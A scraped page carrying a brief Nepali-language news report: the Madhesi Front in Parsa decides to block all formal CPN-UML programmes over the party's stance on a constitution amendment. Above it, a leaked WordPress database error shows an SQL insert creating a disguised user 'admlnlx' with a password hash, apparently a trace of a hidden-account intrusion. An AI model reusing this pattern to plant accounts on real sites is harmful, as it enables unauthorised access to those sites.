WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7B156vEdva6wfpwoJdLkfcf4DQ/cm0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 13:17:39', '', 'admlnlx', 'admlnlx')
वीरगंज, मंसिर १८–
नेपाल कम्युनिष्ट पार्टी एमालेको संविधान संशोधन प्रस्तावको बिरोध गरेकोले उसलाई कुनै पनि औपचारिक कार्यक्रम पर्सामा गर्न नदिने मधेसी मोर्चाले घोषणा गरेको छ। संयुक्त लोकतान्त्रिक मधेसी मोर्चाको आज (शनिबार) बसेको बैठकले एमाले पार्टीको औपचारिक कार्यक्रम गर्न नदिने निर्णय गरेको हो।
मधेसी मोर्चाको बैठकले मधेस आन्दोलनबाट उठेको माग पूरा गर्न बाधक बनेकाले एमालेलाई मधेसबिरोधी दल भएको ठहर गर्दै पर्सामा कुनै पनि राजनीतिक गतिविधि र कार्यक्रम गर्न नदिने र कार्यक्रम गरे त्यसको सशक्त प्रतिकार गर्ने निर्णय समेत बैठकले गरेको छ।
मधेसी जनताको अधिकारलाई कुन्ठित गर्दै एकल जातीय राज्य र विभेदकारी राज्य चलाउन सोच राख्ने एमाले पार्टीका कुनै पनि नेतालाई पर्सा जिल्लाको भूमिमा औपचारिक कार्यक्रम गर्न नदिने मोर्चाको बैठकले निर्णय गरेको संघीय समाजवादी फोरम पर्साका अध्यक्ष प्रदीप यादवले बताए।